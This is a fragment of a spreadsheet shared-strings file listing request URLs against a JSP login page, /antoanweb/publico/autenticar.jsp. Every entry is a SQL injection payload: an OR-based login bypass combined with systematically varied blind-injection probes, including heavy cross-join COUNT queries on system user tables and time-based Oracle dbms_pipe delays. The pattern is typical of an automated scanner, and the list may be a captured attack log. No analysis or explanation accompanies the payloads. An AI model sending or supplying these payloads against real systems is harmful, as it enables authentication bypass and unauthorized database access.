  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and9644=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and'wmuu'like'wmuu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and9644=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and("rayf"="rayf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and9644=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and(("jxdc"="jxdc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and9644=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and((("beat"="beat</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and9644=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and"uzjh"="uzjh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and9644=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and("uvlr"like"uvlr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and9644=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and(("ubys"like"ubys</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and9644=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and((("qgvg"like"qgvg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and9644=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and"wphz"like"wphz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and5069=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and5069=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and5069=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and5069=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and5069=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and(5157=5157</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and5069=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and((2791=2791</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and5069=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and(((1076=1076</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand5069=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and5069=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and('fqgj'='fqgj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and5069=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and(('zrcj'='zrcj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and5069=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and((('ufka'='ufka</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and5069=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and'xajz'='xajz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and5069=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and('jqlx'like'jqlx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and5069=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and(('iuux'like'iuux</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and5069=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and((('xaiq'like'xaiq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and5069=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and'cibx'like'cibx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and5069=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and("hhyw"="hhyw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and5069=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and(("wljp"="wljp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and5069=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and((("pqfu"="pqfu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and5069=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and"jixq"="jixq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and5069=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and("vtfb"like"vtfb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and5069=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and(("lywf"like"lywf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and5069=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and((("zbjs"like"zbjs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and5069=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)--and"qtkm"like"qtkm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and103=dbms_pipe.receive_message(chr(117)||chr(69)||chr(116)||chr(111),5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and103=dbms_pipe.receive_message(chr(117)||chr(69)||chr(116)||chr(111),5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and103=dbms_pipe.receive_message(chr(117)||chr(69)||chr(116)||chr(111),5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and103=dbms_pipe.receive_message(chr(117)||chr(69)||chr(116)||chr(111),5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and103=dbms_pipe.receive_message(chr(117)||chr(69)||chr(116)||chr(111),5)and(5483=5483</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and103=dbms_pipe.receive_message(chr(117)||chr(69)||chr(116)||chr(111),5)and((1897=1897</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and103=dbms_pipe.receive_message(chr(117)||chr(69)||chr(116)||chr(111),5)and(((4162=4162</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand103=dbms_pipe.receive_message(chr(117)||chr(69)||chr(116)||chr(111),5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and103=dbms_pipe.receive_message(chr(117)||chr(69)||chr(116)||chr(111),5)and('cipd'='cipd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and103=dbms_pipe.receive_message(chr(117)||chr(69)||chr(116)||chr(111),5)and(('ecnu'='ecnu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and103=dbms_pipe.receive_message(chr(117)||chr(69)||chr(116)||chr(111),5)and((('kyas'='kyas</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and103=dbms_pipe.receive_message(chr(117)||chr(69)||chr(116)||chr(111),5)and'tqgp'='tqgp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and103=dbms_pipe.receive_message(chr(117)||chr(69)||chr(116)||chr(111),5)and('kuqz'like'kuqz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and103=dbms_pipe.receive_message(chr(117)||chr(69)||chr(116)||chr(111),5)and(('ebzm'like'ebzm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and103=dbms_pipe.receive_message(chr(117)||chr(69)||chr(116)||chr(111),5)and((('zmvy'like'zmvy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and103=dbms_pipe.receive_message(chr(117)||chr(69)||chr(116)||chr(111),5)and'wgpj'like'wgpj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and103=dbms_pipe.receive_message(chr(117)||chr(69)||chr(116)||chr(111),5)and("qhbj"="qhbj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and103=dbms_pipe.receive_message(chr(117)||chr(69)||chr(116)||chr(111),5)and(("iure"="iure</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and103=dbms_pipe.receive_message(chr(117)||chr(69)||chr(116)||chr(111),5)and((("fwya"="fwya</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and103=dbms_pipe.receive_message(chr(117)||chr(69)||chr(116)||chr(111),5)and"mcru"="mcru</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and103=dbms_pipe.receive_message(chr(117)||chr(69)||chr(116)||chr(111),5)and("cxsa"like"cxsa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and103=dbms_pipe.receive_message(chr(117)||chr(69)||chr(116)||chr(111),5)and(("xnqv"like"xnqv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and103=dbms_pipe.receive_message(chr(117)||chr(69)||chr(116)||chr(111),5)and((("jtrh"like"jtrh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and103=dbms_pipe.receive_message(chr(117)||chr(69)||chr(116)||chr(111),5)and"auqc"like"auqc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and3318=dbms_pipe.receive_message(chr(67)||chr(101)||chr(73)||chr(104),5)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and3318=dbms_pipe.receive_message(chr(67)||chr(101)||chr(73)||chr(104),5)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and3318=dbms_pipe.receive_message(chr(67)||chr(101)||chr(73)||chr(104),5)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and3318=dbms_pipe.receive_message(chr(67)||chr(101)||chr(73)||chr(104),5)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and3318=dbms_pipe.receive_message(chr(67)||chr(101)||chr(73)||chr(104),5)--and(6786=6786</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and3318=dbms_pipe.receive_message(chr(67)||chr(101)||chr(73)||chr(104),5)--and((3991=3991</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and3318=dbms_pipe.receive_message(chr(67)||chr(101)||chr(73)||chr(104),5)--and(((7091=7091</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand3318=dbms_pipe.receive_message(chr(67)||chr(101)||chr(73)||chr(104),5)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and3318=dbms_pipe.receive_message(chr(67)||chr(101)||chr(73)||chr(104),5)--and('nnlm'='nnlm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and3318=dbms_pipe.receive_message(chr(67)||chr(101)||chr(73)||chr(104),5)--and(('qpqm'='qpqm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and3318=dbms_pipe.receive_message(chr(67)||chr(101)||chr(73)||chr(104),5)--and((('bfuf'='bfuf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and3318=dbms_pipe.receive_message(chr(67)||chr(101)||chr(73)||chr(104),5)--and'jbns'='jbns</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and3318=dbms_pipe.receive_message(chr(67)||chr(101)||chr(73)||chr(104),5)--and('jree'like'jree</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and3318=dbms_pipe.receive_message(chr(67)||chr(101)||chr(73)||chr(104),5)--and(('ympt'like'ympt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and3318=dbms_pipe.receive_message(chr(67)||chr(101)||chr(73)||chr(104),5)--and((('tpqy'like'tpqy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and3318=dbms_pipe.receive_message(chr(67)||chr(101)||chr(73)||chr(104),5)--and'bask'like'bask</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and3318=dbms_pipe.receive_message(chr(67)||chr(101)||chr(73)||chr(104),5)--and("dias"="dias</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and3318=dbms_pipe.receive_message(chr(67)||chr(101)||chr(73)||chr(104),5)--and(("grec"="grec</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and3318=dbms_pipe.receive_message(chr(67)||chr(101)||chr(73)||chr(104),5)--and((("cifo"="cifo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and3318=dbms_pipe.receive_message(chr(67)||chr(101)||chr(73)||chr(104),5)--and"isjz"="isjz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and3318=dbms_pipe.receive_message(chr(67)||chr(101)||chr(73)||chr(104),5)--and("dqhc"like"dqhc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and3318=dbms_pipe.receive_message(chr(67)||chr(101)||chr(73)||chr(104),5)--and(("yfms"like"yfms</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and3318=dbms_pipe.receive_message(chr(67)||chr(101)||chr(73)||chr(104),5)--and((("aukt"like"aukt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and3318=dbms_pipe.receive_message(chr(67)||chr(101)||chr(73)||chr(104),5)--and"gcsj"like"gcsj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and47=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and47=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and47=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and47=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and47=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and(3953=3953</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and47=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and((1641=1641</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and47=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and(((1282=1282</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand47=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and47=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and('rdlm'='rdlm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and47=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and(('wbmf'='wbmf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and47=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and((('jnmr'='jnmr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and47=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and'rmcm'='rmcm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and47=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and('ftsd'like'ftsd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and47=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and(('shjr'like'shjr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and47=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and((('olcl'like'olcl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and47=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and'cqhw'like'cqhw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and47=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and("bjdx"="bjdx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and47=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and(("nagl"="nagl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and47=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and((("yqys"="yqys</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and47=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and"biev"="biev</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and47=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and("hkvr"like"hkvr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and47=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and(("nbwc"like"nbwc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and47=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and((("umpu"like"umpu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and47=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and"wlci"like"wlci</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and9871=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and9871=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and9871=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and9871=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)--</t>
  </si>
  <si>
